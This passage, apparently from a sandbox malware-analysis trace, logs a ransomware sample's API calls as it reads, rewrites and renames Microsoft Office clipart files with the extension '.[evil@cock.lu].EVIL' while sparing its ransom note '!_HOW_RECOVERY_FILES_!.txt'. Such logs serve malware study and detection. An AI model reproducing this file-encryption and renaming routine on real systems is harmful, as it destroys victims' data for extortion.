out: _File=0x7ffc020ee2a0) returned 0 [0147.581] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf.[evil@cock.lu].evil")) returned 1 [0147.582] ??_V@YAXPEAX@Z () returned 0x1 [0147.585] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF", dwFileAttributes=0x200) returned 0 [0147.585] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.585] wcsstr (_Str="J0157831.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.585] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF") returned 69 [0147.585] wcscmp (_String1="J0157831.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.585] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0157831.WMF") returned 0x0 [0147.585] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF") returned 0x45 [0147.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.587] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2c84, lpOverlapped=0x0) returned 1 [0147.594] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.594] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.594] _errno () returned 0x84b1160840 [0147.594] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.594] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ca0, lpOverlapped=0x0) returned 1 [0147.594] CloseHandle (hObject=0x1a8) returned 1 [0147.594] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.594] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.594] __uncaught_exception () returned 0x84b1160800 [0147.594] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.595] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf.[evil@cock.lu].evil")) returned 1 [0147.595] ??_V@YAXPEAX@Z () returned 0x1 [0147.598] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF", dwFileAttributes=0x200) returned 0 [0147.598] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.598] wcsstr (_Str="J0158071.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.598] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF") returned 69 [0147.599] wcscmp (_String1="J0158071.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.599] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0158071.WMF") returned 0x0 [0147.599] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF") returned 0x45 [0147.599] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.600] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x48dc, lpOverlapped=0x0) returned 1 [0147.607] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.607] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.607] _errno () returned 0x84b1160840 [0147.607] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.607] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x48e0, lpOverlapped=0x0) returned 1 [0147.607] CloseHandle (hObject=0x1a8) returned 1 [0147.608] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.608] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.608] __uncaught_exception () returned 0x84b1160800 [0147.608] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.608] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf.[evil@cock.lu].evil")) returned 1 [0147.609] ??_V@YAXPEAX@Z () returned 0x1 [0147.612] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF", dwFileAttributes=0x200) returned 0 [0147.613] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.613] wcsstr (_Str="J0158477.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.613] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF") returned 69 [0147.613] wcscmp (_String1="J0158477.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.613] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0158477.WMF") returned 0x0 [0147.613] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF") returned 0x45 [0147.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.615] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x462e, lpOverlapped=0x0) returned 1 [0147.622] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.622] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.622] _errno () returned 0x84b1160840 [0147.622] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.622] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x4640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4640, lpOverlapped=0x0) returned 1 [0147.622] CloseHandle (hObject=0x1a8) returned 1 [0147.622] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.622] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.623] __uncaught_exception () returned 0x84b1160800 [0147.623] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.623] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf.[evil@cock.lu].evil")) returned 1 [0147.624] ??_V@YAXPEAX@Z () returned 0x1 [0147.627] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF", dwFileAttributes=0x200) returned 0 [0147.627] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.628] wcsstr (_Str="J0160590.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.628] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF") returned 69 [0147.628] wcscmp (_String1="J0160590.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.628] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0160590.WMF") returned 0x0 [0147.628] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF") returned 0x45 [0147.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.630] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x72de, lpOverlapped=0x0) returned 1 [0147.665] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.665] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.665] _errno () returned 0x84b1160840 [0147.665] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.665] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x72e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x72e0, lpOverlapped=0x0) returned 1 [0147.665] CloseHandle (hObject=0x1a8) returned 1 [0147.665] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.665] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.666] __uncaught_exception () returned 0x84b1160800 [0147.666] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.666] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf.[evil@cock.lu].evil")) returned 1 [0147.667] ??_V@YAXPEAX@Z () returned 0x1 [0147.669] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF", dwFileAttributes=0x200) returned 0 [0147.670] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.670] wcsstr (_Str="J0164153.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.670] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG") returned 69 [0147.670] wcscmp (_String1="J0164153.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.670] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0164153.JPG") returned 0x0 [0147.670] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG") returned 0x45 [0147.670] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.672] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb594, lpOverlapped=0x0) returned 1 [0147.678] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.678] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.678] _errno () returned 0x84b1160840 [0147.678] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.678] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xb5a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb5a0, lpOverlapped=0x0) returned 1 [0147.679] CloseHandle (hObject=0x1a8) returned 1 [0147.679] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.679] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.679] __uncaught_exception () returned 0x84b1160800 [0147.679] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.679] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg.[evil@cock.lu].evil")) returned 1 [0147.680] ??_V@YAXPEAX@Z () returned 0x1 [0147.683] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG", dwFileAttributes=0x200) returned 0 [0147.683] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.683] wcsstr (_Str="J0168644.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.683] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF") returned 69 [0147.683] wcscmp (_String1="J0168644.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.683] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0168644.WMF") returned 0x0 [0147.683] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF") returned 0x45 [0147.683] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.686] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x51aa, lpOverlapped=0x0) returned 1 [0147.693] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.693] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.693] _errno () returned 0x84b1160840 [0147.693] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.693] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x51c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x51c0, lpOverlapped=0x0) returned 1 [0147.694] CloseHandle (hObject=0x1a8) returned 1 [0147.694] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.694] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.694] __uncaught_exception () returned 0x84b1160800 [0147.694] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.694] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf.[evil@cock.lu].evil")) returned 1 [0147.695] ??_V@YAXPEAX@Z () returned 0x1 [0147.698] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF", dwFileAttributes=0x200) returned 0 [0147.698] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.698] wcsstr (_Str="J0171685.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.698] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF") returned 69 [0147.698] wcscmp (_String1="J0171685.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.698] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0171685.WMF") returned 0x0 [0147.698] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF") returned 0x45 [0147.698] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.700] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3888, lpOverlapped=0x0) returned 1 [0147.708] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.708] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.708] _errno () returned 0x84b1160840 [0147.708] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.708] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x38a0, lpOverlapped=0x0) returned 1 [0147.708] CloseHandle (hObject=0x1a8) returned 1 [0147.708] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.708] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.708] __uncaught_exception () returned 0x84b1160800 [0147.708] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.709] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf.[evil@cock.lu].evil")) returned 1 [0147.709] ??_V@YAXPEAX@Z () returned 0x1 [0147.712] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF", dwFileAttributes=0x200) returned 0 [0147.713] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.713] wcsstr (_Str="J0171847.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.713] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF") returned 69 [0147.713] wcscmp (_String1="J0171847.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.713] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0171847.WMF") returned 0x0 [0147.713] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF") returned 0x45 [0147.713] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.715] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ae8, lpOverlapped=0x0) returned 1 [0147.731] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.731] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.731] _errno () returned 0x84b1160840 [0147.731] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.731] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b00, lpOverlapped=0x0) returned 1 [0147.731] CloseHandle (hObject=0x1a8) returned 1 [0147.732] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.732] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.732] __uncaught_exception () returned 0x84b1160800 [0147.732] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.732] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf.[evil@cock.lu].evil")) returned 1 [0147.733] ??_V@YAXPEAX@Z () returned 0x1 [0147.736] SetFileAttributesW (lpFileName="C:\\\\Program 